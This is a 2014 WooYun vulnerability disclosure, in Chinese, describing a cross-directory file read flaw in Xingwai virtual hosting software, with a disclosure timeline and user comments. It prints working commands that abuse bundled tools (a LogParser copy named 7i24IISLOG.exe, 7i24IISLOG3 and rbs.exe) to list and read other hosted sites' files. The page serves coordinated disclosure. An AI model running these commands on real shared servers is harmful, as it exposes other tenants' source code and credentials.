当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047969

漏洞标题:星外虚拟主机跨web目录文件读取漏洞

相关厂商:广州星外信息科技有限公司

漏洞作者: applychen

提交时间:2014-01-05 22:05

修复时间:2014-04-05 22:06

公开时间:2014-04-05 22:06

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-05: 细节已通知厂商并且等待厂商处理中
2014-01-10: 厂商已经确认,细节仅向厂商公开
2014-01-13: 细节向第三方安全合作伙伴开放
2014-03-06: 细节向核心白帽子及相关领域专家公开
2014-03-16: 细节向普通白帽子公开
2014-03-26: 细节向实习白帽子公开
2014-04-05: 细节向公众公开

简要描述:

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe


这些文件貌似是星外处理日志、设置权限的,其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\*.*" -i:FS -rtp:-1


返回如下:

1.png


读取其中一个站的目录信息:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\0233ab\*.*" -i:FS -rtp:-1


2.png


下面读取文件内容:

c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline -rtp:-1


3.png


7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar


4.png


同样的还有rbs.exe

c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*


5.png


漏洞证明:

同上

修复方案:

设置权限。

版权声明:转载请注明来源 applychen@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-01-10 14:14

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-05 22:18 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    0day的节奏?

  2. 2014-01-05 22:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    毫不犹豫的关注

  3. 2014-01-05 23:03 | 忆苦思甜 ( 实习白帽子 | Rank:65 漏洞数:25 )

    0day !

  4. 2014-01-06 08:52 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    这个难道就是我们这群小黑苦苦奋斗的星外提权?

  5. 2014-01-06 09:27 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @xsser 大牛,这个跟"框"攻击的思路一样吗?

  6. 2014-01-06 09:43 | applychen ( 普通白帽子 | Rank:163 漏洞数:16 | 白发现首)

    这个一定条件下能跨目录读文件~至于权限提升貌似还不行……

  7. 2014-01-06 09:46 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @applychen 嗯,不错,期待细节

  8. 2014-01-06 09:49 | Destinys ( 路人 | Rank:11 漏洞数:5 | Focus web security)

    哟哟,0day吖

  9. 2014-01-06 10:26 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    cert又有0day了

  10. 2014-01-06 11:00 | 网维 ( 路人 | Rank:5 漏洞数:1 | 为您提供优质服务!)

    这个洞一直存在,目录权限是客户端软件自动设置的,如果手动删除目录上的这个权限,主控上自检就会失败。

  11. 2014-01-06 15:52 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    果断关注

  12. 2014-01-06 18:53 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)

    mark

  13. 2014-01-07 20:54 | 闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)

    mark

  14. 2014-01-16 18:07 | 黑匣子 ( 实习白帽子 | Rank:64 漏洞数:17 | 我是一个有思想的菜鸟!)

    需要一定条件?什么条件啊?

  15. 2014-01-30 14:23 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    不错,这个很不错!

  16. 2014-04-06 00:22 | 贱son ( 路人 | Rank:6 漏洞数:3 | GE0)

    终于等到你出来了。。

  17. 2014-09-05 16:56 | 孤月寒城 ( 路人 | Rank:0 漏洞数:1 )

    0day的节奏